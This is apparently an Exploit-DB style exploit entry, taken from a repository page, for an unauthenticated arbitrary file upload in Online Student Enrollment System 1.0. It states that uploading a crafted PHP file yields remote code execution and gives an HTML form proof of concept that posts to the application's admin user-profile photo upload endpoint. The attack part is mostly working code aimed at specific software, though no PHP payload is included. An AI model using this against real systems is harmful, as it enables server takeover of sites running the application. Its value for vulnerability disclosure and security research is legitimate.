09b5d3c1b6
6 changes to exploits/shellcodes Frigate 2.02 - Denial Of Service (PoC) FileRun 2019.05.21 - Reflected Cross-Site Scripting Student Enrollment 1.0 - Unauthenticated Remote Code Execution Odoo 12.0 - Local File Inclusion Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload WebPort 1.19.1 - Reflected Cross-Site Scripting WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting
24 lines
No EOL
1 KiB
Text
24 lines
No EOL
1 KiB
Text
# Exploit Title: Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload
|
|
# Google Dork: N/A
|
|
# Date: 2020-06-20
|
|
# Exploit Author: BKpatron
|
|
# Vendor Homepage: https://www.campcodes.com/projects/php/4745/online-student-enrollment-system-in-php-mysqli/
|
|
# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/student_enrollment_1.zip
|
|
# Version: v1.0
|
|
# Tested on: Win 10
|
|
# CVE: N/A
|
|
|
|
# Vulnerability:
|
|
Online Student Enrollment System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution
|
|
(RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file.
|
|
|
|
#CSRF PoC:
|
|
|
|
<html>
|
|
<body>
|
|
<form action="http://localhost/student_enrollment/admin/index.php?page=user-profile" method="POST" enctype="multipart/form-data">
|
|
<input type="file" name="userphoto" required="" id="photo"><br>
|
|
<input class="btn btn-info" type="submit" name="upphoto" value="Upload Photo">
|
|
</form>
|
|
</body>
|
|
</html> |